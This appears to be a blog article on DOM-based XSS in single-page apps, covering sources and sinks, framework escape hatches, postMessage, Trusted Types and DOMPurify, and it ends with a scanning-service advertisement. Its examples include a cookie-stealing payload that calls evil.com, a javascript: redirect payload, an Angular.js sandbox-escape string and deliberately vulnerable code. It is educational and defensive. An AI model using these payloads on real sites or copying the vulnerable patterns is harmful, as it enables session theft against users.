A fintech startup shipped their React dashboard in Q3 last year. Solid team. TypeScript everywhere. CSP headers configured. Server-side output encoding on every API response. They did the work.
An attacker stole session tokens from 12,000 users through the URL hash fragment. The payload never touched the server. Not one WAF rule triggered. Not one log entry. The XSS lived and died entirely in the browser.
That's DOM XSS.
Why Server-Side Protections Are Blind Here
Traditional XSS — reflected, stored — follows a path everyone understands. Malicious input goes to the server, comes back unsanitized in HTML, browser executes it. The fix is well-documented: encode output, validate input, set Content-Security-Policy. Done. Except it's not done, because DOM XSS doesn't follow that path at all.
DOM-based XSS happens when JavaScript reads from an attacker-controlled source and writes to a dangerous sink — all client-side. The server never sees the payload. Your beautiful sanitization middleware? Irrelevant. Your WAF with 4,000 rules? Looking the wrong direction entirely.
Sources are places where attacker data enters the DOM:
- window.location.hash — never sent to the server
- window.location.search — sometimes sent, often parsed client-side before that matters
- document.referrer
- window.name — survives cross-origin navigation, which is terrifying
- postMessage data from other windows/iframes
- localStorage / sessionStorage
Sinks are where that data causes damage:
- innerHTML, outerHTML
- document.write()
- eval(), setTimeout(string), setInterval(string)
- element.setAttribute() on event handlers
- jQuery's .html(), $() with user input
Connect any source to any sink without sanitization and you've got DOM XSS. Simple concept. Incredibly easy to miss in code review.
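The whole class reduces to a few lines. As a minimal sketch (renderUserLabel is an illustrative helper, not a standard API), the fix is choosing a write that cannot be parsed as HTML:

```javascript
// Vulnerable shape: a source flows straight into a parsing sink.
//   el.innerHTML = window.location.hash.substring(1);

// Safe shape: textContent writes plain text; the browser never
// parses the value, so markup in it stays inert.
function renderUserLabel(el, untrusted) {
  el.textContent = untrusted;
}
```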
The React Safety Net Has Holes
React escapes by default. Everyone knows this. JSX converts <script> into harmless text. Great. Teams hear this and assume they're safe. They're not.
// React's dangerouslySetInnerHTML — the name is a warning
// that roughly 40% of production React apps ignore
function UserProfile({ bio }) {
  return <div dangerouslySetInnerHTML={{ __html: bio }} />;
}
// "But we sanitize on the server!" Cool.
// What about the markdown preview that parses client-side?
// What about the rich text editor output?
But dangerouslySetInnerHTML is at least obvious. The subtle ones hurt more.
// This looks harmless
function RedirectHandler() {
  const params = new URLSearchParams(window.location.search);
  const returnUrl = params.get('returnUrl');
  // "It's just a redirect, what could go wrong?"
  // javascript:alert(document.cookie) could go wrong
  window.location.href = returnUrl;
}
// Or this gem from an actual production app
function DynamicWidget() {
  const hash = window.location.hash.substring(1);
  const config = JSON.parse(decodeURIComponent(hash));
  // Attacker controls config entirely
  // config.template gets injected into the DOM
  document.getElementById('widget').innerHTML = config.template;
}
That second one passed code review at a company with a security team. Four people approved it.
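A hedged fix for the RedirectHandler above, sketched under the assumption that redirects should stay on the current origin (safeReturnUrl is an illustrative helper, not a standard API):

```javascript
// Resolve the parameter against the app's origin and accept only
// same-origin destinations. This rejects javascript:, data:, and
// open redirects to other hosts in one check.
function safeReturnUrl(raw, origin) {
  if (!raw) return '/'; // missing parameter falls back to a safe path
  let url;
  try {
    url = new URL(raw, origin);
  } catch {
    return '/'; // unparseable input also falls back
  }
  if (url.origin !== origin) return '/';
  return url.href;
}

// window.location.href = safeReturnUrl(params.get('returnUrl'), window.location.origin);
```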
Vue and Angular Aren't Immune Either
Vue's v-html directive is the exact same trap. Angular has bypassSecurityTrustHtml() which, again, the name screams danger but people use it anyway because the sanitizer "breaks their HTML." Yeah. That's what sanitizers do. They break malicious HTML.
<!-- Vue: "But I need to render rich content!" -->
<template>
  <div v-html="userGeneratedContent"></div>
</template>
<!-- Angular: bypassing the one thing protecting you -->
<div [innerHTML]="sanitizer.bypassSecurityTrustHtml(userData)"></div>
The pattern is always the same. Framework provides a safety mechanism. Developer finds it inconvenient. Developer disables it. Vulnerability enters. Nobody notices for months.
postMessage: The Attack Vector Nobody Audits
This one's getting worse. Modern SPAs embed iframes everywhere — payment widgets, analytics dashboards, chat integrations, OAuth popups. They communicate via postMessage. And almost nobody validates the origin properly.
// How it usually looks in production
window.addEventListener('message', (event) => {
  // TODO: add origin check
  // ^^^ committed 18 months ago, still TODO
  const data = JSON.parse(event.data);
  document.getElementById('preview').innerHTML = data.html;
});
// What it should look like
window.addEventListener('message', (event) => {
  if (event.origin !== 'https://trusted-widget.example.com') {
    return; // not optional, not a TODO
  }
  // Still sanitize the data even from trusted origins
  const data = JSON.parse(event.data);
  const clean = DOMPurify.sanitize(data.html);
  document.getElementById('preview').innerHTML = clean;
});
Burp Suite's DOM Invader finds these in minutes. Attackers use it too. An iframe on a malicious page sends a crafted postMessage to your app's window — if your app is open in another tab — and the payload executes. No user interaction beyond visiting the attacker's page while logged into yours.
URL Fragment Attacks Keep Working
Hash fragments (#) are never sent to the server — per RFC 3986, the URI spec, the fragment is handled entirely by the client. Your server logs won't show them. Your WAF won't see them. Your server-side sanitization won't touch them. But your client-side router reads them constantly.
Older Angular.js apps using #/route style routing were catastrophically vulnerable. But it's not just legacy code. Any SPA that reads location.hash to configure state, restore UI, or parse deep links is at risk.
// Real pattern from a dashboard app
// URL: https://app.example.com/dashboard#view=<img src=x onerror=fetch('https://evil.com/steal?c='+document.cookie)>
const params = new URLSearchParams(location.hash.substring(1));
const viewName = params.get('view');
// This was used to set a breadcrumb label
document.querySelector('.breadcrumb-active').innerHTML = viewName;
// Game over
One img tag in a URL fragment. That's all it took.
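A minimal hardening of that breadcrumb pattern, assuming the set of valid views is known (KNOWN_VIEWS and resolveViewName are illustrative names): treat the fragment value as an identifier to look up, never as markup, and write the label with textContent.

```javascript
// Assumed set of valid view names for this app
const KNOWN_VIEWS = new Set(['overview', 'reports', 'settings']);

function resolveViewName(rawHash) {
  const params = new URLSearchParams(rawHash.replace(/^#/, ''));
  const view = params.get('view');
  // Anything outside the allowlist, including injected markup, falls back
  return KNOWN_VIEWS.has(view) ? view : 'overview';
}

// document.querySelector('.breadcrumb-active').textContent = resolveViewName(location.hash);
```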
Client-Side Template Injection
Angular.js (version 1.x, still running on more sites than anyone wants to admit) had template injection that turned any reflected input into code execution. Sandbox escapes like {{constructor.constructor('alert(1)')()}} existed for every version before 1.6, when the sandbox was removed entirely. Thousands of apps still run 1.5.
Modern frameworks handle this better, but client-side template engines outside the big three — Handlebars, Mustache, EJS on the client — still get fed user input directly. Server-side template injection gets all the conference talks. Client-side template injection gets actually exploited in the wild because nobody's scanning for it.
DOMPurify Isn't a Silver Bullet, But Use It Anyway
DOMPurify is the best client-side HTML sanitizer available. Use it. But understand what it does and doesn't do.
import DOMPurify from 'dompurify';
// Good: sanitize before innerHTML
element.innerHTML = DOMPurify.sanitize(untrustedHTML);
// Better: configure it tight
const clean = DOMPurify.sanitize(untrustedHTML, {
  ALLOWED_TAGS: ['b', 'i', 'em', 'strong', 'a', 'p', 'br'],
  ALLOWED_ATTR: ['href', 'title'],
  ALLOW_DATA_ATTR: false,
});
// DOMPurify won't help here — this isn't an HTML context
element.setAttribute('href', userInput); // javascript: URLs still work
element.style.cssText = userInput; // CSS injection
It handles HTML context. For URL context, you need URL validation. For JavaScript context — don't put user input in JavaScript context. Full stop. There's no sanitizer that makes eval(userInput) safe.
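For the URL context specifically, a validation sketch: parse the value and allowlist schemes rather than trying to blocklist javascript: variants (isSafeLinkUrl and the base origin are assumptions for illustration).

```javascript
function isSafeLinkUrl(raw) {
  let url;
  try {
    // Hypothetical base so relative paths like "/about" still resolve
    url = new URL(raw, 'https://app.example.com');
  } catch {
    return false; // unparseable input is rejected outright
  }
  // Allowlist schemes; blocklisting "javascript:" spellings is a losing game
  return url.protocol === 'https:' || url.protocol === 'http:';
}

// if (isSafeLinkUrl(userInput)) element.setAttribute('href', userInput);
```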
Finding DOM XSS Requires Different Tools
Traditional SAST tools look at server-side code. They find reflected and stored XSS. Most of them barely understand JavaScript data flow, and they definitely don't trace a value from location.hash through three function calls into innerHTML. Semgrep has some rules for it. CodeQL's JavaScript analysis is decent. But the false negative rate on DOM XSS with most scanners is embarrassingly high.
The Trusted Types API, currently shipped in Chromium-based browsers, is the most underrated defense mechanism in browser security right now. It forces all dangerous sink assignments to go through a policy function. Deploy it and DOM XSS becomes structurally impossible — assuming you don't write a policy that just passes everything through.
// Content-Security-Policy header:
// require-trusted-types-for 'script';
// trusted-types myPolicy;
const policy = trustedTypes.createPolicy('myPolicy', {
  createHTML: (input) => DOMPurify.sanitize(input),
  createScriptURL: (input) => {
    const url = new URL(input, window.location.origin);
    if (url.origin !== window.location.origin) {
      throw new Error('Blocked cross-origin script URL');
    }
    return url.toString();
  },
});
// Now innerHTML requires a TrustedHTML object
// Raw strings throw a TypeError
element.innerHTML = policy.createHTML(untrustedData);
Google deployed Trusted Types across their apps and eliminated DOM XSS as a vulnerability class. Not reduced. Eliminated. The data's from their own security team — 60+ applications, zero DOM XSS after rollout.
Automated Security Scanning
Manual review catches maybe 30% of DOM XSS. Developers don't think like attackers, and data flow through a modern SPA with state management, routing, and third-party integrations is genuinely hard to trace by hand. ScanMyCode.dev performs automated security audits that trace these client-side data flows, flagging dangerous source-to-sink connections with exact file and line numbers plus concrete remediation steps.
What Actually Fixes This
Stop using innerHTML. Seriously. textContent exists. Template literals with DOM APIs exist. If you must insert HTML, DOMPurify goes between the untrusted data and the sink. No exceptions. Not "we'll add it later." Now.
Deploy Trusted Types. Even in report-only mode to start. You'll see every dangerous sink assignment in your CSP violation reports and probably want to cry at how many there are.
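A report-only rollout can look like this (a header sketch; the /csp-reports endpoint is an assumed reporting URL, and the policy name matches the earlier example). Sinks keep working, but every raw-string assignment shows up as a violation report:

```
Content-Security-Policy-Report-Only:
  require-trusted-types-for 'script';
  trusted-types myPolicy;
  report-uri /csp-reports
```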
Validate postMessage origins. Validate URL schemes before assigning to href or location. Audit every use of dangerouslySetInnerHTML, v-html, and bypassSecurityTrustHtml — treat them like you'd treat a raw SQL query.
And scan your frontend code specifically for security issues. Backend security gets all the budget. Frontend JavaScript is where the users are, where the tokens live, where the sessions exist. Don't wait until 12,000 users get their sessions hijacked through a URL hash. Run a security audit on your codebase and get actionable results in 24 hours.